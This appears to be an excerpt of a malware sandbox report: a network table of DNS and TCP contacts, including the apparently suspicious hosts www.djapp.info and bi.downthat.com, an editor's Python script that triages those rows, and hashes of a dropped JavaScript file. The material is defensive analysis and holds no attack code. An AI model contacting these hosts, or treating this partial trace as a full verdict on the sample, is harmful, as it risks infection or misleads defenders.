US 8.8.8.8:53 10.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 18.119.154.66:80 bi.downthat.com tcp
US 8.8.8.8:53 www.hugedomains.com udp
GB 142.250.187.234:443 tcp
US 8.8.8.8:53 66.154.119.18.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 18.119.154.66:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 8.8.8.8:53 191.70.67.172.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 18.119.154.66:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 8.8.8.8:53 www.djapp.info udp
US 18.119.154.66:80 bi.downthat.com tcp
US 8.8.8.8:53 www.djapp.info udp
US 18.119.154.66:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 17.173.189.20.in-addr.arpa udp
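The Windows 10 network table mixes three kinds of rows: the sample's own DNS queries and TCP flows, reverse (in-addr.arpa) lookups, and TCP flows the sandbox could not pair with a name. Reading it flat hides the point that www.djapp.info was queried five times but never connected to, while bi.downthat.com and www.hugedomains.com were. The block below is an added example by the editor, not part of the report: it parses the rows above verbatim, aggregates per host, converts PTR names back to addresses and keeps only those that match an address the sample actually connected to (the rest are treated as OS background noise, an editor's assumption for a sandbox run), and lists the unattributed TCP flows separately.

```python
import re
from collections import defaultdict

# Rows copied verbatim from the behavioral2 Network table above.
NETWORK_TABLE = """\
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 10.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 18.119.154.66:80 bi.downthat.com tcp
US 8.8.8.8:53 www.hugedomains.com udp
GB 142.250.187.234:443 tcp
US 8.8.8.8:53 66.154.119.18.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 18.119.154.66:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 8.8.8.8:53 191.70.67.172.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 18.119.154.66:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 8.8.8.8:53 www.djapp.info udp
US 18.119.154.66:80 bi.downthat.com tcp
US 8.8.8.8:53 www.djapp.info udp
US 18.119.154.66:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 17.173.189.20.in-addr.arpa udp
"""

# Country, ip:port, optional domain, protocol; the domain column is empty for
# flows the sandbox could not tie to a DNS answer.
ROW_RE = re.compile(
    r"^(?P<cc>[A-Z]{2}) (?P<ip>[\d.]+):(?P<port>\d+)(?: (?P<name>\S+))? (?P<proto>tcp|udp)$"
)
PTR_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)\.in-addr\.arpa$")


def parse_rows(table):
    """Parse the flat table into one dict per flow; non-matching lines are skipped."""
    flows = []
    for line in table.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["port"] = int(d["port"])
            flows.append(d)
    return flows


def reverse_name_to_ip(name):
    """'191.70.67.172.in-addr.arpa' -> '172.67.70.191'; None for non-PTR names."""
    m = PTR_RE.match(name or "")
    return ".".join(reversed(m.groups())) if m else None


def triage(flows):
    """Aggregate flows per host and separate PTR noise and unattributed TCP."""
    hosts = defaultdict(lambda: {"dns": 0, "tcp": 0, "ips": set()})
    ptr_ips, unattributed = [], []
    for f in flows:
        name = f["name"]
        if f["proto"] == "udp" and f["port"] == 53:
            ip = reverse_name_to_ip(name)
            if ip:
                ptr_ips.append(ip)
            elif name:
                hosts[name]["dns"] += 1
        elif f["proto"] == "tcp":
            if name:
                hosts[name]["tcp"] += 1
                hosts[name]["ips"].add(f["ip"])
            else:
                unattributed.append(f"{f['ip']}:{f['port']}")
    # A PTR lookup is only interesting when it targets an address the sample
    # connected to; the other reverse lookups are treated as background noise.
    contacted = {ip for h in hosts.values() for ip in h["ips"]}
    return {
        "hosts": {n: {"dns": h["dns"], "tcp": h["tcp"], "ips": sorted(h["ips"])}
                  for n, h in hosts.items()},
        "ptr_lookups": len(ptr_ips),
        "ptr_for_contacted_ips": sorted(set(ptr_ips) & contacted),
        "unattributed_tcp": unattributed,
    }


if __name__ == "__main__":
    summary = triage(parse_rows(NETWORK_TABLE))
    for name, h in summary["hosts"].items():
        print(f"{name}: dns={h['dns']} tcp={h['tcp']} ips={h['ips']}")
    print("PTR lookups:", summary["ptr_lookups"], "of which for contacted IPs:",
          summary["ptr_for_contacted_ips"])
    print("unattributed TCP:", summary["unattributed_tcp"])
```

Two of the thirteen reverse lookups resolve back to addresses the sample connected to (18.119.154.66 for bi.downthat.com and 172.67.70.191 for www.hugedomains.com), which is the usual pattern of the OS looking up peers after the fact; the remaining eleven and the three unattributed TCP flows are not evidence about the sample without process attribution, so they should not go on a blocklist as-is.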

Files

C:\Users\Admin\AppData\Local\Temp\fuf4031.js

MD5 3813cab188d1de6f92f8b82c2059991b
SHA1 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256 a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA512 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76